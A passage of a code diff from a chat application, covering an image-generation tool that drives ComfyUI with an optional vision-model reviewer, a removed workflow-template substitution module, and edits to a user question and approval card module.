chat on a text-only model with no reviewer configured simply keeps the first
|
||||
image, which is the behaviour with review switched off -- said here rather
|
||||
than failing, because "you asked for a picture and got an error about
|
||||
vision" is a worse answer than a picture.
|
||||
"""
|
||||
from lembas.db.models import Connection, Model
|
||||
from lembas.db.session import session_scope
|
||||
|
||||
values = context.image_config or {}
|
||||
if not values.get("review_enabled"):
|
||||
return None
|
||||
|
||||
wanted = str(values.get("review_model_id") or "")
|
||||
try:
|
||||
with session_scope() as db:
|
||||
model = None
|
||||
if wanted:
|
||||
# By the model's own id, and by primary key for anything stored
|
||||
# before that was the rule -- a value written by an older release
|
||||
# is a primary key and must keep working.
|
||||
model = db.scalar(
|
||||
select(Model).where(Model.model_id == wanted).order_by(Model.position)
|
||||
) or db.get(Model, wanted)
|
||||
if model is None:
|
||||
# Worth a line: the fallback below quietly reviews with the
|
||||
# chat's own model instead, which is a different picture
|
||||
# reviewed by a different model than an administrator chose.
|
||||
log.warning(
|
||||
"the configured image reviewer %r no longer exists; "
|
||||
"falling back to the chat's own model",
|
||||
wanted,
|
||||
)
|
||||
if model is None and context.model_id:
|
||||
model = db.scalar(
|
||||
select(Model).where(
|
||||
Model.model_id == context.model_id,
|
||||
Model.connection_id == context.connection_id,
|
||||
)
|
||||
)
|
||||
if model is None or not (model.capabilities_json or {}).get("vision"):
|
||||
return None
|
||||
connection = db.get(Connection, model.connection_id)
|
||||
if connection is None or not connection.enabled:
|
||||
return None
|
||||
return Endpoint.from_connection(connection), model.model_id
|
||||
except Exception: # noqa: BLE001 - no reviewer is a degraded mode, not an error
|
||||
log.warning("could not resolve an image reviewer", exc_info=True)
|
||||
return None
|
||||
|
||||
|
||||
async def _review(
|
||||
context: ToolContext, endpoint: Endpoint, model_id: str, prompt: str, payload: bytes
|
||||
) -> tuple[bool, str]:
|
||||
"""Show the reviewer the image and ask whether to keep it.
|
||||
|
||||
Answers `(keep, reason)`. **Anything that goes wrong is a keep**: the
|
||||
reviewer is a second opinion on a picture that already exists, and losing an
|
||||
image because a judging request timed out would be the check destroying the
|
||||
thing it was checking.
|
||||
"""
|
||||
from lembas.db.session import session_scope
|
||||
from lembas.services import files as files_service
|
||||
from lembas.services import prompts as prompts_service
|
||||
|
||||
preview = files_service.preview_data_uri(payload, max_edge=768)
|
||||
if preview is None:
|
||||
return True, ""
|
||||
|
||||
with session_scope() as db:
|
||||
instruction = prompts_service.resolve(db, "task.image_review")
|
||||
# An administrator who cleared the fragment has switched reviewing off, the
|
||||
# same way clearing `task.compact` switches compaction off. Nothing is asked
|
||||
# of anyone and the image is kept.
|
||||
if not instruction.strip():
|
||||
return True, ""
|
||||
|
||||
body = {
|
||||
"model": model_id,
|
||||
"messages": [
|
||||
{"role": "system", "content": instruction},
|
||||
{
|
||||
"role": "user",
|
||||
"content": [
|
||||
{"type": "text", "text": f"The request was: {prompt}"},
|
||||
{"type": "image_url", "image_url": {"url": preview}},
|
||||
],
|
||||
},
|
||||
],
|
||||
"max_tokens": MAX_VERDICT_TOKENS,
|
||||
"temperature": 0,
|
||||
}
|
||||
try:
|
||||
answer = (await complete(endpoint, body)).strip()
|
||||
except LLMError as exc:
|
||||
log.info("could not review a generated image: %s", exc.message)
|
||||
return True, ""
|
||||
|
||||
verdict, _, reason = answer.partition("\n")
|
||||
keep = not verdict.strip().upper().startswith("RETRY")
|
||||
return keep, (reason or verdict).strip()[:300]
|
||||
|
||||
|
||||
# --- The runner ----------------------------------------------------------------
|
||||
def _over_quota(context: ToolContext) -> str:
|
||||
"""Why this account may not draw another picture today, or "".
|
||||
|
||||
Its own session, opened and closed before anything else: this runs before a
|
||||
request that takes a minute, and holding a session across one is the trade
|
||||
every long call in this codebase already refuses.
|
||||
"""
|
||||
from lembas.db.models import User
|
||||
from lembas.db.session import session_scope
|
||||
from lembas.services import usage as usage_service
|
||||
|
||||
if not context.owner_id:
|
||||
return ""
|
||||
with session_scope() as db:
|
||||
return usage_service.over_image_budget(db, db.get(User, context.owner_id))
|
||||
|
||||
|
||||
async def run(context: ToolContext, args: dict[str, Any]) -> ToolOutcome:
|
||||
"""Generate one image, review it if there is anybody to ask, and keep one."""
|
||||
from lembas.db.session import session_scope
|
||||
from lembas.services import files as files_service
|
||||
|
||||
event: dict[str, Any] = {
|
||||
"name": "image_generate",
|
||||
"kind": "image",
|
||||
"query": str(args.get("prompt") or "")[:200],
|
||||
"results": [],
|
||||
}
|
||||
|
||||
prompt = str(args.get("prompt") or "").strip()
|
||||
if not prompt:
|
||||
return ToolOutcome(
|
||||
"No prompt was given, so nothing was drawn. Say what the picture should show.",
|
||||
{**event, "status": "error", "error": "No prompt."},
|
||||
)
|
||||
if not context.chat_id:
|
||||
return ToolOutcome(
|
||||
"Images can only be generated inside a chat.",
|
||||
{**event, "status": "error", "error": "No chat."},
|
||||
)
|
||||
|
||||
# Before a minute of somebody's GPU is spent. Its own quota because it is
|
||||
# its own cost: a picture is no tokens at all, so a token budget says
|
||||
# nothing about how many of them one account may make.
|
||||
over = _over_quota(context)
|
||||
if over:
|
||||
return ToolOutcome(over, {**event, "status": "error", "error": over})
|
||||
|
||||
values = context.image_config or {}
|
||||
config = config_of(context)
|
||||
if not config.configured:
|
||||
return ToolOutcome(
|
||||
"No image generator is configured on this instance.",
|
||||
{**event, "status": "error", "error": "No ComfyUI configured."},
|
||||
)
|
||||
|
||||
# Resolve the template and the checkpoint: what the model asked for, then
|
||||
# this chat's usual, then the instance default. Every rung is a preference
|
||||
# and none of them is a constraint, which is what lets a model that only
|
||||
# wrote a prompt still get a picture.
|
||||
try:
|
||||
with session_scope() as db:
|
||||
rows, checkpoints = _choices(db, values)
|
||||
wanted = str(args.get("template") or "")
|
||||
chosen = _pick(rows, wanted, context.image_workflow_id, values)
|
||||
if chosen is None:
|
||||
return ToolOutcome(
|
||||
"No image workflow has been set up on this instance.",
|
||||
{**event, "status": "error", "error": "No workflow."},
|
||||
)
|
||||
template = json.loads(json.dumps(chosen.workflow_json or {}))
|
||||
template_slug, template_name = chosen.slug, chosen.name
|
||||
except ToolOutcome: # pragma: no cover - defensive
|
||||
raise
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.exception("could not resolve an image workflow")
|
||||
return ToolOutcome(
|
||||
f"The image workflow could not be read: {exc}",
|
||||
{**event, "status": "error", "error": str(exc)},
|
||||
)
|
||||
|
||||
checkpoint = _checkpoint(
|
||||
str(args.get("model") or ""),
|
||||
context.image_checkpoint,
|
||||
checkpoints,
|
||||
instance_default=str(values.get("default_checkpoint") or ""),
|
||||
)
|
||||
if checkpoint is None:
|
||||
return ToolOutcome(
|
||||
"No checkpoint is available. An administrator has to list them on the "
|
||||
"image generation page.",
|
||||
{**event, "status": "error", "error": "No checkpoint."},
|
||||
)
|
||||
|
||||
given = {name: args.get(name) for name in workflow.MODEL_SETTABLE if name in args}
|
||||
given["model"] = checkpoint
|
||||
given["prompt"] = prompt
|
||||
|
||||
reviewer = _reviewer(context)
|
||||
tries = int(values.get("max_tries") or 1) if reviewer else 1
|
||||
preserve = bool(values.get("preserve_vram"))
|
||||
|
||||
attempts: list[Attempt] = []
|
||||
kept: tuple[bytes, dict[str, Any]] | None = None
|
||||
# What the last attempt actually asked for, so a failure can name concrete
|
||||
# numbers back at the model rather than saying "try something smaller".
|
||||
params_used: dict[str, Any] = workflow.resolve(given, settings=values)
|
||||
|
||||
try:
|
||||
for number in range(1, tries + 1):
|
||||
if preserve:
|
||||
await _unload_llm(context)
|
||||
|
||||
params = workflow.resolve(
|
||||
{**given, "seed": args.get("seed") if number == 1 else None}, settings=values
|
||||
)
|
||||
params_used = params
|
||||
refs = await comfy.await_images(
|
||||
config, await comfy.submit(config, workflow.fill(template, params))
|
||||
)
|
||||
if not refs:
|
||||
raise comfy.ComfyError("ComfyUI finished but saved no image.")
|
||||
payload = await comfy.fetch_image(config, refs[0])
|
||||
|
||||
if preserve:
|
||||
await comfy.free(config)
|
||||
|
||||
if reviewer is None:
|
||||
attempts.append(Attempt(number, params["seed"], kept=True))
|
||||
kept = (payload, params)
|
||||
break
|
||||
|
||||
endpoint, model_id = reviewer
|
||||
keep, reason = await _review(context, endpoint, model_id, prompt, payload)
|
||||
last = number == tries
|
||||
attempts.append(Attempt(number, params["seed"], kept=keep or last, verdict=reason))
|
||||
if keep or last:
|
||||
kept = (payload, params)
|
||||
break
|
||||
except comfy.ComfyError as exc:
|
||||
if preserve:
|
||||
# It failed *inside* the far side, so its models are still resident
|
||||
# and the language model is still unloaded. Freeing here is what
|
||||
# lets the reply carry on and say what happened.
|
||||
await comfy.free(config)
|
||||
return ToolOutcome(
|
||||
f"The image could not be generated: {exc.message}{_advice(exc, params_used)}",
|
||||
{**event, "status": "error", "error": exc.message},
|
||||
)
|
||||
|
||||
if preserve:
|
||||
await comfy.free(config)
|
||||
if kept is None: # pragma: no cover - the loop always keeps its last attempt
|
||||
return ToolOutcome(
|
||||
"Nothing was generated.", {**event, "status": "error", "error": "No image."}
|
||||
)
|
||||
|
||||
payload, params = kept
|
||||
try:
|
||||
with session_scope() as db:
|
||||
attachment = files_service.store(
|
||||
db,
|
||||
user_id=context.owner_id,
|
||||
chat_id=context.chat_id,
|
||||
payload=payload,
|
||||
filename=f"{template_slug}-{params['seed']}.png",
|
||||
# What ComfyUI made, at the size it made it. See `_keep_image`.
|
||||
keep_original=True,
|
||||
source_label="Image generation",
|
||||
source_path=f"{checkpoint} · seed {params['seed']}",
|
||||
)
|
||||
attachment_id = attachment.id
|
||||
width, height = attachment.width, attachment.height
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.exception("could not store a generated image")
|
||||
return ToolOutcome(
|
||||
f"The image was generated but could not be saved: {exc}",
|
||||
{**event, "status": "error", "error": str(exc)},
|
||||
)
|
||||
|
||||
return ToolOutcome(
|
||||
_describe(prompt, template_name, checkpoint, params, attempts),
|
||||
{
|
||||
**event,
|
||||
"status": "ok",
|
||||
"detail": f"{template_name} · {checkpoint}",
|
||||
"text": _transcript(params, attempts),
|
||||
# Bound to the reply by `generation._persist`, the single writer. A
|
||||
# runner may create the row; only the loop may say which turn owns
|
||||
# it.
|
||||
"attachment_id": attachment_id,
|
||||
"image": {"id": attachment_id, "width": width, "height": height},
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
def _advice(exc: comfy.ComfyError, params: dict[str, Any]) -> str:
|
||||
"""What to do about a failure, when there is something to do about it.
|
||||
|
||||
Only for the two that have an obvious next move. Everything else gets the
|
||||
reason and nothing else -- a model told to "try again" after a broken
|
||||
workflow will try the identical thing, and a suggestion invented for a
|
||||
failure nobody understands is a guess wearing the application's authority.
|
||||
|
||||
The numbers are concrete on purpose. "Use a lower resolution" against a
|
||||
request that was already 512x512 is advice that cannot be followed, so the
|
||||
halved size is worked out here where the request is known.
|
||||
"""
|
||||
if isinstance(exc, comfy.Interrupted):
|
||||
return (
|
||||
" Somebody stopped it deliberately, so do not simply start it again — say so and ask."
|
||||
)
|
||||
if not isinstance(exc, comfy.OutOfMemory):
|
||||
return ""
|
||||
|
||||
width, height = int(params.get("width") or 512), int(params.get("height") or 512)
|
||||
smaller = f"{max(256, width // 2)}x{max(256, height // 2)}"
|
||||
return (
|
||||
f" Try once more at a smaller size — {smaller} instead of {width}x{height} — "
|
||||
"or with a lighter checkpoint if one is offered. Do not repeat the same "
|
||||
"request unchanged; it will run out of memory again."
|
||||
)
|
||||
|
||||
|
||||
def _pick(rows: list[Any], wanted: str, chat_default: str, values: dict[str, Any]) -> Any:
|
||||
"""The workflow to use: asked for, then the chat's, then the instance's."""
|
||||
by_slug = {row.slug: row for row in rows}
|
||||
if wanted and wanted in by_slug:
|
||||
return by_slug[wanted]
|
||||
by_id = {row.id: row for row in rows}
|
||||
if chat_default and chat_default in by_id:
|
||||
return by_id[chat_default]
|
||||
fallback = str(values.get("default_workflow_id") or "")
|
||||
if fallback and fallback in by_id:
|
||||
return by_id[fallback]
|
||||
return rows[0] if rows else None
|
||||
|
||||
|
||||
def _checkpoint(
|
||||
wanted: str, chat_default: str, available: list[str], *, instance_default: str = ""
|
||||
) -> str | None:
|
||||
"""The checkpoint to draw with, on the same ladder.
|
||||
|
||||
Most specific first: what the model named, then this chat's own, then the
|
||||
instance default, then whatever is first in the list. The instance rung is
|
||||
the new one -- without it, "the default" was position zero in a textarea an
|
||||
administrator had typed in some order, which is a default by accident.
|
||||
|
||||
A name the instance does not have is ignored at every rung rather than
|
||||
passed through: it would reach ComfyUI, be refused, and cost a round to
|
||||
discover -- and the model was shown the list it may choose from.
|
||||
"""
|
||||
if wanted and wanted in available:
|
||||
return wanted
|
||||
if chat_default and chat_default in available:
|
||||
return chat_default
|
||||
if instance_default and instance_default in available:
|
||||
return instance_default
|
||||
return available[0] if available else None
|
||||
|
||||
|
||||
def _describe(
|
||||
prompt: str, template: str, checkpoint: str, params: dict[str, Any], attempts: list[Attempt]
|
||||
) -> str:
|
||||
"""What the model reads back.
|
||||
|
||||
It is told the image is already on screen, because otherwise the commonest
|
||||
next thing it does is offer to show it -- and there is nothing it could do
|
||||
to comply.
|
||||
"""
|
||||
lines = [
|
||||
"The image has been generated and is shown to them. It is not a link and "
|
||||
"needs no further action.",
|
||||
f"Prompt: {prompt}",
|
||||
f"Template {template}, checkpoint {checkpoint}, "
|
||||
f"{params['width']}x{params['height']}, seed {params['seed']}, "
|
||||
f"{params['steps']} steps, cfg {params['cfg']}.",
|
||||
]
|
||||
if len(attempts) > 1:
|
||||
rejected = [a for a in attempts if not a.kept]
|
||||
lines.append(
|
||||
f"It took {len(attempts)} attempts; the earlier ones were rejected on review "
|
||||
f"({'; '.join(a.verdict for a in rejected if a.verdict) or 'no reason given'})."
|
||||
)
|
||||
return "\n".join(lines)
|
||||
|
||||
|
||||
def _transcript(params: dict[str, Any], attempts: list[Attempt]) -> str:
|
||||
"""What the reader sees when they open the tool block.
|
||||
|
||||
The rejected attempts are recorded here and their images are not kept. A
|
||||
transcript full of pictures somebody's model decided against is noise, and
|
||||
the disk they would occupy buys nothing -- what is worth knowing is that it
|
||||
took three goes and why the first two did not do.
|
||||
"""
|
||||
lines = [
|
||||
f"seed {params['seed']} · {params['steps']} steps · cfg {params['cfg']} · "
|
||||
f"{params['sampler']}/{params['scheduler']} · denoise {params['denoise']}"
|
||||
]
|
||||
if len(attempts) > 1:
|
||||
lines.append("")
|
||||
for attempt in attempts:
|
||||
state = "kept" if attempt.kept else "rejected"
|
||||
reason = f" — {attempt.verdict}" if attempt.verdict else ""
|
||||
lines.append(f"Attempt {attempt.number} (seed {attempt.seed}): {state}{reason}")
|
||||
return "\n".join(lines)
|
||||
@@ -1,257 +0,0 @@
|
||||
"""Turning a stored template and a model's arguments into a ComfyUI workflow.
|
||||
|
||||
A template is an API-format workflow with `{{placeholders}}` where the values
|
||||
go. Which node holds the prompt is therefore the administrator's statement
|
||||
rather than something guessed from node types -- sniffing for the first
|
||||
`CLIPTextEncode` works on the shipped template and on nothing else, and gets
|
||||
positive and negative the wrong way round the first time somebody reorders them.
|
||||
|
||||
**Substitution walks the parsed JSON, not the text of it.** A value that is
|
||||
*exactly* `"{{steps}}"` is replaced by the number 20, not by the string "20";
|
||||
ComfyUI validates types and refuses the second. A placeholder inside a longer
|
||||
string still substitutes as text, which is what makes
|
||||
`"{{prompt}}, masterpiece"` work. Doing it textually would also mean a prompt
|
||||
containing a quotation mark produced a document that no longer parses, on the
|
||||
one input guaranteed to contain arbitrary text.
|
||||
|
||||
The names are the tool's parameter names, so there is one vocabulary: what a
|
||||
model may set, what the admin page documents and what a template may reference
|
||||
cannot drift apart.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import re
|
||||
import secrets
|
||||
from typing import Any
|
||||
|
||||
# Every hole a template may carry. A name outside this set is left alone, the
|
||||
# same rule `prompts.substitute` follows -- a literal `{{x}}` is not a feature,
|
||||
# but silently deleting one is worse than leaving it visible.
|
||||
PLACEHOLDERS = (
|
||||
"model",
|
||||
"prompt",
|
||||
"negative",
|
||||
"seed",
|
||||
"steps",
|
||||
"cfg",
|
||||
"width",
|
||||
"height",
|
||||
"sampler",
|
||||
"scheduler",
|
||||
"denoise",
|
||||
# How many pictures one run produces. Late to the list, and the reason is
|
||||
# worth stating: `batch_size` was a literal `1` in the base template, so an
|
||||
# administrator whose card can comfortably make four at a time had no way of
|
||||
# saying so short of editing the JSON. Not a tool parameter -- a model asking
|
||||
# for six images because it is unsure is exactly the cost this should not
|
||||
# invite -- so it fills from the instance default and nowhere else.
|
||||
"batch",
|
||||
)
|
||||
|
||||
# What a model may name. Everything else in `PLACEHOLDERS` fills from a default.
|
||||
MODEL_SETTABLE = tuple(name for name in PLACEHOLDERS if name != "batch")
|
||||
|
||||
# The floor, taken from the base template. An instance's own defaults sit above
|
||||
# this (see `resolve`), and this stays as the last resort so a fresh install
|
||||
# behaves exactly as it always did.
|
||||
#
|
||||
# `seed` is deliberately absent: it has no fixed default, because one would make
|
||||
# every generation that did not name a seed identical -- and would make the
|
||||
# retry loop produce the same rejected image four times over.
|
||||
DEFAULTS: dict[str, Any] = {
|
||||
"negative": "text, watermark",
|
||||
"steps": 20,
|
||||
"cfg": 8.0,
|
||||
"width": 512,
|
||||
"height": 512,
|
||||
"sampler": "euler",
|
||||
"scheduler": "normal",
|
||||
"denoise": 1.0,
|
||||
"batch": 1,
|
||||
}
|
||||
|
||||
# What each hole is for, and what it lands as. Read by the workflow editor, so
|
||||
# somebody writing a template is told what `{{sampler}}` fills without reading
|
||||
# this file -- and in particular is told the two names that do not match
|
||||
# ComfyUI's own, which is the mistake that costs an afternoon.
|
||||
DESCRIPTIONS: dict[str, tuple[str, str]] = {
|
||||
"model": ("text", "The checkpoint. Fills ComfyUI's `ckpt_name`, not `model`."),
|
||||
"prompt": ("text", "What to draw. The only value a model must supply."),
|
||||
"negative": ("text", "What to keep out of the picture."),
|
||||
"seed": ("number", "The noise seed. Absent or negative means a fresh random one."),
|
||||
"steps": ("number", "How many denoising steps. More is slower, not always better."),
|
||||
"cfg": ("number", "How closely to follow the prompt. A decimal."),
|
||||
"width": ("number", "Pixels across. A multiple of 64."),
|
||||
"height": ("number", "Pixels down. A multiple of 64."),
|
||||
"sampler": ("text", "The sampling method. Fills ComfyUI's `sampler_name`, not `sampler`."),
|
||||
"scheduler": ("text", "The noise schedule."),
|
||||
"denoise": ("number", "How much of the latent to redraw. 1.0 for text-to-image."),
|
||||
"batch": ("number", "How many images one run makes. Fills `batch_size`."),
|
||||
}
|
||||
|
||||
# ComfyUI's own ranges, read off `/object_info`. Clamped rather than refused: a
|
||||
# model that asks for 300 steps has misjudged rather than misbehaved, and one
|
||||
# clarifying round to say so is worse than doing the sensible thing.
|
||||
LIMITS: dict[str, tuple[float, float]] = {
|
||||
"steps": (1, 150),
|
||||
"cfg": (0.0, 30.0),
|
||||
"width": (64, 2048),
|
||||
"height": (64, 2048),
|
||||
"denoise": (0.0, 1.0),
|
||||
# Not ComfyUI's ceiling, which is 4096, but a sane one: this multiplies
|
||||
# every generation's time and VRAM, and an administrator who wants more than
|
||||
# eight at once wants a different workflow rather than a bigger number here.
|
||||
"batch": (1, 8),
|
||||
}
|
||||
|
||||
# ComfyUI's seed is a uint64. Generated here rather than left to the far side
|
||||
# so the value can be reported back -- "it looked like this and here is how to
|
||||
# get it again" is most of what a seed is for.
|
||||
MAX_SEED = 2**64 - 1
|
||||
|
||||
_PLACEHOLDER = re.compile(r"\{\{\s*([a-z][a-z0-9_]*)\s*\}\}")
|
||||
|
||||
|
||||
def random_seed() -> int:
|
||||
return secrets.randbelow(MAX_SEED)
|
||||
|
||||
|
||||
def instance_defaults(values: dict[str, Any] | None) -> dict[str, Any]:
|
||||
"""The `default_*` keys out of the image settings, as placeholder names.
|
||||
|
||||
Only the ones actually set: an absent or empty key means "no opinion", and
|
||||
must fall through to `DEFAULTS` rather than land as an empty string in a
|
||||
workflow. That is the same reading `resolve` gives a model's own arguments,
|
||||
and it is why an administrator can set two of these and leave the rest.
|
||||
"""
|
||||
out: dict[str, Any] = {}
|
||||
for name in PLACEHOLDERS:
|
||||
if name in ("prompt", "seed", "model"):
|
||||
# A default prompt is not a thing; a default seed would make every
|
||||
# picture identical; the checkpoint has its own setting and its own
|
||||
# per-chat override, resolved before this is reached.
|
||||
continue
|
||||
value = (values or {}).get(f"default_{name}")
|
||||
if value is None or value == "":
|
||||
continue
|
||||
out[name] = value
|
||||
return out
|
||||
|
||||
|
||||
def resolve(given: dict[str, Any], *, settings: dict[str, Any] | None = None) -> dict[str, Any]:
|
||||
"""The full parameter set: what was asked for, over what this instance
|
||||
prefers, over the built-in floor.
|
||||
|
||||
Three rungs, most specific winning, and the middle one is the new part. For
|
||||
the whole life of this feature there were only two -- so 512x512, euler and
|
||||
twenty steps were the values every instance got, whatever card it was
|
||||
running on, and the only ways to move them were to bake literals into a
|
||||
template instead of placeholders or to write prose in the instructions box
|
||||
and hope. `DEFAULTS` stays underneath so an instance that sets nothing
|
||||
behaves exactly as it did.
|
||||
|
||||
Absent and null are both "no opinion", at both levels. A model that emits
|
||||
`"seed": null` rather than omitting the key is common enough that treating
|
||||
it as a request for seed zero would be a bug nobody could see.
|
||||
|
||||
**A negative seed means random**, which is what `-1` means in ComfyUI's own
|
||||
interface, in A1111, and in every other thing that has ever asked somebody
|
||||
for a seed. A model that has read any of them will write it, and without
|
||||
this it went through the uint64 wrap and came out as 18446744073709551615 --
|
||||
a perfectly valid *fixed* seed, so "give me something new" produced the same
|
||||
picture every time. Exactly the wrong answer, arrived at silently.
|
||||
"""
|
||||
values: dict[str, Any] = {**DEFAULTS, **instance_defaults(settings)}
|
||||
for name, value in (given or {}).items():
|
||||
# `batch` is absent from `MODEL_SETTABLE`, so a model naming it is
|
||||
# ignored here rather than refused -- the tool schema never offered it,
|
||||
# and one that invents the key has guessed rather than misbehaved.
|
||||
if name in MODEL_SETTABLE and value is not None and value != "":
|
||||
values[name] = value
|
||||
|
||||
seed = _whole(values.get("seed"), default=-1)
|
||||
values["seed"] = random_seed() if seed < 0 else seed % (MAX_SEED + 1)
|
||||
for name in ("steps", "width", "height", "batch"):
|
||||
values[name] = _clamp(_whole(values.get(name), DEFAULTS[name]), name)
|
||||
for name in ("cfg", "denoise"):
|
||||
values[name] = _clamp(_decimal(values.get(name), DEFAULTS[name]), name)
|
||||
for name in ("prompt", "negative", "sampler", "scheduler", "model"):
|
||||
values[name] = str(values.get(name) or "")
|
||||
return values
|
||||
|
||||
|
||||
def _whole(value: Any, default: int) -> int:
|
||||
try:
|
||||
return int(float(value))
|
||||
except (TypeError, ValueError):
|
||||
return default
|
||||
|
||||
|
||||
def _decimal(value: Any, default: float) -> float:
|
||||
try:
|
||||
return float(value)
|
||||
except (TypeError, ValueError):
|
||||
return default
|
||||
|
||||
|
||||
def _clamp(value: Any, name: str) -> Any:
|
||||
low, high = LIMITS.get(name, (None, None))
|
||||
if low is None:
|
||||
return value
|
||||
clamped = min(max(value, low), high)
|
||||
return int(clamped) if isinstance(value, int) else clamped
|
||||
|
||||
|
||||
def fill(template: Any, values: dict[str, Any]) -> Any:
|
||||
"""A copy of the template with its placeholders replaced.
|
||||
|
||||
Recursive over dicts and lists, because a workflow is nested and a
|
||||
placeholder can be anywhere in it -- including inside a node's `_meta`,
|
||||
which is harmless and should not be treated specially.
|
||||
"""
|
||||
if isinstance(template, dict):
|
||||
return {key: fill(value, values) for key, value in template.items()}
|
||||
if isinstance(template, list):
|
||||
return [fill(item, values) for item in template]
|
||||
if isinstance(template, str):
|
||||
return _fill_string(template, values)
|
||||
return template
|
||||
|
||||
|
||||
def _fill_string(text: str, values: dict[str, Any]) -> Any:
|
||||
"""One string, which may *become* a number.
|
||||
|
||||
The whole-value case is what keeps types right: `"{{steps}}"` is the number
|
||||
and not a string that looks like one. Anything else is ordinary text
|
||||
substitution, so `"{{prompt}}, masterpiece"` reads as a sentence.
|
||||
"""
|
||||
whole = _PLACEHOLDER.fullmatch(text.strip())
|
||||
if whole is not None:
|
||||
return values.get(whole.group(1), text)
|
||||
|
||||
def swap(match: re.Match[str]) -> str:
|
||||
name = match.group(1)
|
||||
return str(values[name]) if name in values else match.group(0)
|
||||
|
||||
return _PLACEHOLDER.sub(swap, text)
|
||||
|
||||
|
||||
def placeholders_in(template: Any) -> set[str]:
|
||||
"""Every `{{name}}` a template uses, for the admin page to report.
|
||||
|
||||
A template that mentions none of them is almost certainly a workflow pasted
|
||||
straight out of ComfyUI without being parameterised, which would generate
|
||||
the same picture whatever anybody typed. Worth saying at save time rather
|
||||
than leaving somebody to discover it.
|
||||
"""
|
||||
found: set[str] = set()
|
||||
if isinstance(template, dict):
|
||||
for value in template.values():
|
||||
found |= placeholders_in(value)
|
||||
elif isinstance(template, list):
|
||||
for item in template:
|
||||
found |= placeholders_in(item)
|
||||
elif isinstance(template, str):
|
||||
found |= {match.group(1) for match in _PLACEHOLDER.finditer(template)}
|
||||
return found
|
||||
@@ -54,38 +54,6 @@ MAX_OPTIONS = 6
|
||||
# what it learned.
|
||||
MAX_QUESTIONS = 8
|
||||
|
||||
# The value the "Something else" row submits. A sentinel rather than a real
|
||||
# option, because it is the one choice on the card the model did not write: it
|
||||
# is added by this code, always, to every question. That is the whole reason the
|
||||
# model is told never to offer an "Other" of its own -- two of them is one that
|
||||
# does nothing, and the model's version would have no box behind it.
|
||||
OTHER = "__other__"
|
||||
|
||||
# How many characters of an option's description are kept. It is a sentence
|
||||
# explaining a choice, not a paragraph, and it is model output landing in a
|
||||
# card somebody is meant to read at a glance.
|
||||
MAX_OPTION_CHARS = 240
|
||||
|
||||
# How much of a refusal's reason is carried back to the model. Generous, because
|
||||
# this is the reader saying what they want instead and truncating that mid-clause
|
||||
# is worse than the tokens it saves -- but bounded, because it lands in a tool
|
||||
# result inside a request that already has a window to fit in.
|
||||
MAX_REASON_CHARS = 2000
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Option:
|
||||
"""One answer offered for a question.
|
||||
|
||||
A `label` alone reads as a button; the optional `description` is what makes
|
||||
a real choice possible -- "Rewrite it" and "Patch it" say nothing about
|
||||
which loses your uncommitted work. Both are model output and are escaped
|
||||
where they are shown.
|
||||
"""
|
||||
|
||||
label: str
|
||||
description: str = ""
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Item:
|
||||
@@ -109,31 +77,8 @@ class Item:
|
||||
title: str
|
||||
detail: str = ""
|
||||
reason: str = ""
|
||||
# What the model says this call is for, in its own words -- distinct from
|
||||
# `reason`, which is why *we* stopped ("Edit mode asks before anything that
|
||||
# runs a command"). Model text, and shown as such: a card carrying an
|
||||
# explanation somebody reads as the application's own would be a card
|
||||
# vouching for it.
|
||||
purpose: str = ""
|
||||
options: tuple[Option, ...] = ()
|
||||
# Whether more than one option may be chosen. The model says which, because
|
||||
# only the model knows whether its options are alternatives ("rewrite or
|
||||
# patch") or a set ("which of these to include"). Exclusive is the default:
|
||||
# a radio group offered where checkboxes were meant costs one clarifying
|
||||
# round, while checkboxes offered for alternatives invite an answer that
|
||||
# contradicts itself.
|
||||
multiple: bool = False
|
||||
# Whether "Something else" is offered, with the box behind it. True for a
|
||||
# question -- the options are the model's guess at the answers and it can be
|
||||
# wrong -- and false for an approval, where the choice is Allow or Don't and
|
||||
# a third way out would mean nothing.
|
||||
options: tuple[str, ...] = ()
|
||||
allow_free_text: bool = True
|
||||
# Whether `detail` can be corrected before this is allowed. Only where the
|
||||
# detail *is* one argument and can be put back where it came from -- a tool
|
||||
# with no entry in `tool_labels.DETAIL_KEYS` gets a `k=repr(v)` summary that
|
||||
# cannot be parsed back, and offering a box that silently changed nothing
|
||||
# would be worse than offering none.
|
||||
editable: bool = False
|
||||
|
||||
|
||||
@dataclass
|
||||
@@ -149,9 +94,7 @@ class Interruption:
|
||||
def kind(self) -> str:
|
||||
return KIND_QUESTION if any(i.kind == KIND_QUESTION for i in self.items) else KIND_APPROVAL
|
||||
|
||||
def resolve(
|
||||
self, outcome: str, *, answers: dict[str, str] | None = None, reason: str = ""
|
||||
) -> bool:
|
||||
def resolve(self, outcome: str, *, answers: dict[str, str] | None = None) -> bool:
|
||||
"""Complete this pause. Idempotent -- a second answer is ignored.
|
||||
|
||||
Returns whether this call was the one that answered it, which is what
|
||||
@@ -160,13 +103,7 @@ class Interruption:
|
||||
"""
|
||||
if self._future is None or self._future.done():
|
||||
return False
|
||||
self._future.set_result(
|
||||
Reply(
|
||||
outcome=outcome,
|
||||
answers=dict(answers or {}),
|
||||
reason=reason.strip()[:MAX_REASON_CHARS],
|
||||
)
|
||||
)
|
||||
self._future.set_result(Reply(outcome=outcome, answers=dict(answers or {})))
|
||||
return True
|
||||
|
||||
|
||||
@@ -176,19 +113,11 @@ class Reply:
|
||||
|
||||
`answers` is keyed by `Item.key`, so a card carrying four questions comes
|
||||
back as four answers in one go. An approval carries none: the verdict is
|
||||
the whole of it -- except for `reason`.
|
||||
|
||||
`reason` is why the reader refused, in their own words, and it belongs to
|
||||
the *card* rather than to an item. The card already covers everything in the
|
||||
round for the reason `interaction` opens with, one verdict answers the lot,
|
||||
and somebody who says "not in that directory" is saying it about the round.
|
||||
Keeping it off `answers` also keeps it clear of `text.<key>`, which on an
|
||||
approval card already means something else entirely -- a corrected command.
|
||||
the whole of it.
|
||||
"""
|
||||
|
||||
outcome: str
|
||||
answers: dict[str, str] = field(default_factory=dict)
|
||||
reason: str = ""
|
||||
|
||||
@property
|
||||
def permitted(self) -> bool:
|
||||
@@ -261,7 +190,6 @@ __all__ = [
|
||||
"KIND_QUESTION",
|
||||
"MAX_OPTIONS",
|
||||
"MAX_QUESTIONS",
|
||||
"MAX_REASON_CHARS",
|
||||
